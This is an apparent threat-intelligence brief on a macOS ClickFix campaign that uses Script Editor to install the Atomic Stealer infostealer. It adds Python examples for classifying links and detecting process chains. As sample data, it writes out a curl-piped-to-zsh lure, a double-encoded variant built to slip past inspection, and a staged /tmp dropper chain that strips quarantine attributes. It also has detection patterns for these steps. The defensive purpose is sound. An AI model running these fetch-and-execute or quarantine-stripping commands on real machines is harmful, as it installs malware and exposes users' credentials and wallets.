
macOS ClickFix Campaign Uses Script Editor to Deploy Atomic Stealer Malware, Threatening Credential Security

A new macOS‑focused campaign abuses the built‑in Script Editor to deliver the Atomic Stealer (AMOS) infostealer. Fake Apple‑themed cleanup sites link to an applescript:// URL that opens Script Editor with a pre‑filled curl | zsh command; once the victim runs it, the payload harvests Keychain entries, browser data, and cryptocurrency wallets. Organizations with macOS endpoints should reassess application controls, browser scheme handling, and user‑awareness programs.

LiveThreat™ Intelligence · April 09, 2026 · Source: bleepingcomputer.com

Severity: High
Type: ThreatIntel
Confidence: High
Affected: 3 sector(s)
Actions: 4 recommended
Source: bleepingcomputer.com

macOS Stealer Campaign Leverages Script Editor for ClickFix Malware Delivery

What Happened — Researchers observed a new campaign that delivers the Atomic Stealer (AMOS) malware to macOS devices by abusing the built‑in Script Editor through a ClickFix‑style social‑engineering lure. Fake Apple‑themed “disk‑cleanup” webpages link to an applescript:// URL, which Script Editor handles by opening a new document pre‑filled with a curl | zsh command; the page then instructs the victim to run it. That command downloads and executes a Mach‑O binary that harvests credentials, crypto wallets, and system data. No macOS vulnerability is exploited: the chain relies entirely on the user pressing Run in a trusted Apple application.
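The applescript:// link is the one artifact of this lure that a defender can inspect before the user ever sees Script Editor. The following is an added example, not code from the original brief or from the researchers: it extracts the script carried in such a link and flags the patterns described above (a do shell script wrapper, a downloader piped into a shell, a base64 decode stage). It assumes Script Editor's handler takes the form applescript://com.apple.scripteditor?action=new&script=<url‑encoded script>; the sample links are constructed and point at a reserved .invalid host, and the double‑encoded variant is included because a single‑pass decoder would classify it as harmless.

```python
"""Inspect applescript:// links for ClickFix-style shell delivery.

Added example, not code from the original brief or from the researchers.
Assumption: Script Editor's URL handler takes the form
applescript://com.apple.scripteditor?action=new&script=<url-encoded script>.
All sample links below are constructed and use a reserved .invalid host.
"""
import re
from urllib.parse import parse_qs, quote, unquote, urlsplit

LURE_SCRIPT = 'do shell script "curl -fsSL https://example.invalid/cleanup.sh | zsh"'
HANDLER = "applescript://com.apple.scripteditor?action=new&script="

# Constructed lure link: opens Script Editor pre-filled with a curl | zsh pipe.
SAMPLE_LINK = HANDLER + quote(LURE_SCRIPT, safe="")
# Same payload percent-encoded twice, to slip past single-pass inspection.
DOUBLE_ENCODED_LINK = HANDLER + quote(quote(LURE_SCRIPT, safe=""), safe="")
# Benign link for comparison: opens the editor with a harmless dialog.
BENIGN_LINK = HANDLER + quote('display dialog "hello"', safe="")

DO_SHELL = re.compile(r"do\s+shell\s+script", re.I)
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b[^|]*\|\s*(zsh|bash|sh)\b", re.I)
DECODE_STAGE = re.compile(r"\bbase64\b[^|;&]*\s(?:-d|-D|--decode)\b", re.I)


def fully_unquote(text, rounds=4):
    """Percent-decode until the text stops changing (bounded to avoid loops)."""
    for _ in range(rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def extract_script(url):
    """Return the script carried by an applescript:// URL, or None for other schemes."""
    parts = urlsplit(url)
    if parts.scheme.lower() != "applescript":
        return None
    values = parse_qs(parts.query).get("script")
    if not values:
        return None
    # parse_qs decodes once; decode again so double-encoding does not hide the payload.
    return fully_unquote(values[0])


def classify(url):
    """Verdicts: 'not-applescript', 'review' (opens Script Editor), or 'block'."""
    script = extract_script(url)
    if script is None:
        return {"verdict": "not-applescript", "script": None, "reasons": []}
    reasons = []
    if DO_SHELL.search(script):
        reasons.append("do shell script")
    hit = PIPE_TO_SHELL.search(script)
    if hit:
        reasons.append("downloader piped into shell: " + hit.group(0))
    if DECODE_STAGE.search(script):
        reasons.append("base64 decode stage")
    return {"verdict": "block" if reasons else "review", "script": script, "reasons": reasons}


if __name__ == "__main__":
    for link in (SAMPLE_LINK, DOUBLE_ENCODED_LINK, BENIGN_LINK, "https://example.invalid/"):
        print(classify(link)["verdict"], classify(link)["reasons"])
```

Any applescript:// link is worth a "review" verdict even without a shell pipe, since opening Script Editor from a web page has no legitimate use in most fleets; the regexes only raise that to "block".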

Why It Matters for TPRM

  • Native, Apple‑signed macOS utilities (Script Editor, curl, zsh) are weaponized, so allow‑listing by binary or signer does not stop the chain; the malicious logic lives in script content, not in a new executable.
  • Stolen Keychain entries, browser credentials, and session cookies let an attacker sign in to SaaS and cloud services as the victim, including portals shared with third‑party vendors, without a password‑based login that might trigger alerts.
  • A compromised endpoint becomes a supply‑chain risk: credentials and sessions harvested from one organization can be replayed against its partners' environments.

Who Is Affected — Any organization that deploys macOS endpoints, with technology, financial services, education, and design firms called out as notable targets.

Recommended Actions

  • Use application control or MDM to restrict Script Editor (or reassign the applescript:// URL scheme) on endpoints whose users have no need for it; because Script Editor is Apple‑signed, allow‑listing by signer alone will not block this chain.
  • Deploy web filtering to block known fake cleanup domains, and use browser URL‑blocklist policy to block or prompt on the applescript:// custom scheme; a network proxy never sees that link because the browser hands it to the local URL handler.
  • Confirm EDR/XDR telemetry covers a shell spawned by Script Editor (or osascript) whose command line pipes curl into zsh, and the follow‑on chain: a base64/gunzip write to /tmp, extended‑attribute stripping, chmod +x, and execution of the dropped Mach‑O.
  • Conduct user‑awareness training focused on ClickFix lures, including the Script Editor variant, and the dangers of running unsolicited scripts or commands from a web page.

Technical Notes — Attack vector: phishing via counterfeit Apple cleanup sites; execution vector: Script Editor (AppleScript/JXA) runs an obfuscated curl | zsh command that decodes a base64‑encoded, gzip‑compressed payload, writes it to /tmp/helper, strips extended attributes (removing any com.apple.quarantine flag so Gatekeeper will not assess the file), makes it executable, and launches the Atomic Stealer binary. The malware exfiltrates Keychain entries, desktop files, browser autofill data, cryptocurrency wallet keys, cookies, stored credit‑card numbers, and system information. Recent macOS releases show a warning when a pasted command is run in Terminal, which blunts classic ClickFix lures; because this variant executes from Script Editor rather than Terminal, that prompt never appears, and the only user‑facing step is Script Editor's own Run button.
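The execution chain in the Technical Notes maps onto a handful of process‑start events, which is what the EDR detection recommended above has to correlate. The following is an added example, not the original brief's or the researchers' code: it runs two rules over constructed process telemetry. The event schema (host, pid, ppid, parent, name, cmdline) is an assumed, simplified record of the kind an EDR exports, the events themselves are constructed, and the example assumes that do shell script spawns /bin/sh as a child of the Script Editor process. Rule 1 catches the Script Editor → shell → curl | zsh spawn on its own; Rule 2 tracks each /tmp path across separate decode, xattr, chmod, and exec events so that a lone chmod +x (the benign developer event) does not fire.

```python
"""Detection logic for the Script Editor -> curl | zsh -> /tmp dropper chain.

Added example, not the original brief's or the researchers' code. The event
schema (host, pid, ppid, parent, name, cmdline) is an assumed, simplified
process-start record such as an EDR might export; all events are constructed.
Assumption: `do shell script` spawns /bin/sh as a child of the Script Editor process.
"""
import re
from collections import defaultdict

SAMPLE_EVENTS = [
    {"host": "mac-01", "pid": 501, "ppid": 500, "parent": "Script Editor", "name": "sh",
     "cmdline": 'sh -c "curl -fsSL https://example.invalid/cleanup | zsh"'},
    {"host": "mac-01", "pid": 502, "ppid": 501, "parent": "sh", "name": "curl",
     "cmdline": "curl -fsSL https://example.invalid/cleanup"},
    {"host": "mac-01", "pid": 503, "ppid": 501, "parent": "sh", "name": "zsh", "cmdline": "zsh"},
    # downloaded script: decode the embedded base64+gzip blob into /tmp/helper
    {"host": "mac-01", "pid": 504, "ppid": 503, "parent": "zsh", "name": "zsh",
     "cmdline": 'zsh -c "echo H4sIAAAAAAAA | base64 -D | gunzip > /tmp/helper"'},
    {"host": "mac-01", "pid": 505, "ppid": 503, "parent": "zsh", "name": "xattr",
     "cmdline": "xattr -c /tmp/helper"},
    {"host": "mac-01", "pid": 506, "ppid": 503, "parent": "zsh", "name": "chmod",
     "cmdline": "chmod +x /tmp/helper"},
    {"host": "mac-01", "pid": 507, "ppid": 503, "parent": "zsh", "name": "helper",
     "cmdline": "/tmp/helper"},
    # benign: a developer making a build script executable must not fire the chain rule
    {"host": "mac-02", "pid": 600, "ppid": 1, "parent": "launchd", "name": "zsh",
     "cmdline": "zsh -c chmod +x /tmp/build.sh"},
]

SCRIPT_HOSTS = {"Script Editor", "osascript"}
SHELLS = {"sh", "zsh", "bash"}
PIPE_TO_SHELL = re.compile(r"\bcurl\b[^|]*\|\s*(?:zsh|bash|sh)\b")
TMP_PATH = re.compile(r"(/tmp/[\w.\-]+)")
# macOS base64 decodes with -D; -d and --decode are accepted by newer builds
STAGES = [
    ("decode", re.compile(r"\bbase64\s+(?:-d|-D|--decode)\b")),
    ("xattr-strip", re.compile(r"\bxattr\s+(?:-c|-d\s+com\.apple\.quarantine)\b")),
    ("chmod-exec", re.compile(r"\bchmod\s+(?:\+x|[0-7]{3,4})\b")),
]


def detect(events):
    """Return a list of alert dicts for the two rules, in event order."""
    alerts = []
    seen = defaultdict(set)  # (host, dropped path) -> stages observed so far
    for ev in events:
        cmd = ev["cmdline"]
        # Rule 1: Script Editor / osascript spawning a shell that pipes curl into a shell
        if ev["parent"] in SCRIPT_HOSTS and ev["name"] in SHELLS and PIPE_TO_SHELL.search(cmd):
            alerts.append({"rule": "script-editor-shell-pipe", "host": ev["host"],
                           "pid": ev["pid"], "detail": cmd})
        # Rule 2: staged /tmp dropper, correlated per host by the dropped path
        for path in set(TMP_PATH.findall(cmd)):
            key = (ev["host"], path)
            for stage, pattern in STAGES:
                if pattern.search(cmd):
                    seen[key].add(stage)
            # fire only when the dropped file is executed after attributes were
            # stripped and it was made executable
            if cmd.split()[0] == path and {"xattr-strip", "chmod-exec"} <= seen[key]:
                alerts.append({"rule": "staged-tmp-dropper", "host": ev["host"], "pid": ev["pid"],
                               "detail": path + " stages=" + ",".join(sorted(seen[key]))})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert["rule"], alert["host"], alert["pid"], alert["detail"])
```

Rule 2 keys on the path rather than on the process tree because the decode, xattr, and chmod steps may arrive as separate short‑lived processes; in production the per‑path state should be time‑bounded and the /tmp prefix widened to the user's TMPDIR.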

Original Source
https://www.bleepingcomputer.com/news/security/new-macos-stealer-campaign-uses-script-editor-in-clickfix-attack/

This LiveThreat Intelligence Brief is an independent analysis. Read the original reporting at the link above.
